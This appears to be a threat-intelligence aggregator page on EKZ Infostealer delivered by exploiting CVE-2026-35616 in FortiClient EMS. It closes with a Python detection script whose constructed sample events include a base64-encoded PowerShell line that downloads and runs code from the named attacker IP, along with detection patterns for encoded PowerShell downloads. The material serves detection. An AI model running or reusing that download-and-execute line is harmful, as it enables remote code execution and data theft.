
EKZ Infostealer delivered through FortiClient EMS abuse

Malware Activity
1 unique source, 1 article

Summary


A new EKZ Infostealer delivery chain abuses FortiClient EMS to silently install a credential stealer and siphon browser data from affected endpoints. After modifying EMS configuration and policies, the attackers launch the malware through FortiClient-managed VPN scripting workflows. It targets Chromium and Firefox data stores, including saved credentials, cookies, and payment details, which raises the risk of account takeover. The payload exfiltrates the stolen data to an attacker-controlled VPS over HTTP.

Related Happenings

FortiClient EMS CVE-2026-35616 exploitation wave

Exploitation Wave
First: 28.05.2026 18:26 Last: 28.05.2026 18:26 Sources 1

How related: Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.

About this happening: **CVE-2026-35616** exploitation in **FortiClient Enterprise Management Server (EMS)** is being used to deliver the undocumented credential stealer **EKZ**. Attackers are abusing u...

Fortinet FortiClient EMS emergency patch release (CVE-2026-35616, CVE-2026-21643)

Security Patch Release
First: 07.04.2026 12:26 Last: 07.04.2026 12:26 Sources 1

How related: Fortinet confirmed in early April that the flaw was being exploited and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.

About this happening: **Fortinet FortiClient EMS** is a **security-patch release** happening centered on **CVE-2026-35616** and **CVE-2026-21643**. Fortinet issued an **out-of-band emergency hotfix** a...

Latest development: 28.05.2026 18:26

Arctic Wolf observed threat actors abusing FortiClient Endpoint Management Server (EMS) and CVE-2026-35616 in May 2026 to modify EMS-managed configuration, disguise FortiEndpoint_Patch.exe as a Fortinet endpoint update, and use fortitray.exe, cmd.exe, and a Base64-encoded PowerShell chain to download malware and exfiltrate browser data to 83.138.53[.]110.

FortiClient EMS improper access control flaw (CVE-2026-35616)

Vulnerability
First: 05.04.2026 21:45 Last: 05.04.2026 21:45 Sources 1

How related: Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.

About this happening: **CVE-2026-35616** is an **actively exploited** improper access control flaw in **FortiClient Enterprise Management Server (EMS)** that lets unauthenticated attackers execute code...

Latest development: 28.05.2026 18:26

Attackers were already abusing **CVE-2026-35616** against **FortiClient EMS** in **May 2026**. The flaw provided **pre-auth API access bypass** and **privilege escalation** before remediation in **7.4.7 and later**.

Stealit fake game and VPN installer campaign

Campaign
First: 13.10.2025 16:45 Last: 13.10.2025 16:45 Sources 1

About this happening: The **Stealit** campaign is using **fake game and VPN installers** to infect users and **move its C2 panel**, increasing the risk of credential and wallet theft. The operation mat...

Stealit malware activity abusing Node.js SEA and counterfeit installers

Malware Activity
First: 10.10.2025 17:25 Last: 10.10.2025 17:25 Sources 1

About this happening: **Stealit** is an active malware activity that uses **Node.js Single Executable Application (SEA)** and some **Electron** builds to spread standalone payloads through counterfeit...

Timeline

  1. 28.05.2026 20:25 2 articles

    EKZ Infostealer is delivered through FortiClient EMS abuse

    Technical Analysis Update

    Arctic Wolf observed attackers exploiting CVE-2026-35616 in FortiClient Enterprise Management Server (EMS) to deliver EKZ Infostealer by abusing endpoint APIs, modifying EMS configuration and VPN policies, and launching malicious scripts through FortiClient-managed VPN workflows. The chain disguised the payload as a Fortinet endpoint update or patch, used base64-encoded PowerShell to download and run the credential stealer, and exfiltrated harvested browser data to an attacker-controlled VPS over HTTP. Fortinet said the flaw was being exploited in early April and released emergency hotfixes for versions 7.4.5 and 7.4.6, while defenders were urged to watch for certificate-authentication anomalies and unexpected Remote Access Profile changes.

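The process chain described above (fortitray.exe, cmd.exe, a Base64-encoded PowerShell stage, a lookalike FortiEndpoint_Patch.exe and the exfiltration host) can be hunted for in endpoint process-creation telemetry. The following Python is an added example, not code from Arctic Wolf, Fortinet or the source article; the indicators come from the page, while the rules, the record shape and the sample events are this example's own assumptions.

```python
import base64
import ntpath
import re

# Indicators named on the page (the exfil host is defanged there); the rules are this example's assumptions.
SUSPECT_PARENTS = {"fortitray.exe", "cmd.exe"}
LOOKALIKE_IMAGES = {"fortiendpoint_patch.exe"}
EXFIL_HOST = "83.138.53.110"
ENC_FLAG = re.compile(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Reasons a process-creation event matches the FortiClient EMS abuse chain (empty if none)."""
    parent, image = (ntpath.basename(ev[k]).lower() for k in ("parent", "image"))
    decoded = decode_encoded_command(ev["cmdline"])
    reasons = []
    if parent == "fortitray.exe" and image in ("cmd.exe", "powershell.exe"):
        reasons.append("shell spawned by the FortiClient tray process")  # baseline this in your fleet first
    if image in LOOKALIKE_IMAGES:
        reasons.append("lookalike Fortinet update binary")
    if decoded is not None and parent in SUSPECT_PARENTS:
        reasons.append(f"encoded PowerShell launched from {parent}")
    if decoded is not None and any(h in decoded.lower() for h in DOWNLOAD_HINTS):
        reasons.append("decoded command downloads content")
    if EXFIL_HOST in ev["cmdline"] + (decoded or ""):
        reasons.append("references known exfiltration host")
    return reasons

# Constructed sample events (not real telemetry), shaped like Sysmon/EDR process-creation records.
SAMPLE_PAYLOAD = f"IEX (New-Object Net.WebClient).DownloadString('http://{EXFIL_HOST}/p')"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe -nop -w hidden -enc " + SAMPLE_ENC},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENC},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\FortiEndpoint_Patch.exe",
     "cmdline": "FortiEndpoint_Patch.exe /silent"},
]
```

Running `score_event` over each record in SAMPLE_EVENTS flags the tray-spawned shell, the encoded download stage and the lookalike binary, while the explorer-launched maintenance script returns no reasons; decoding the encoded command is what lets the host indicator match even when the raw command line never mentions it.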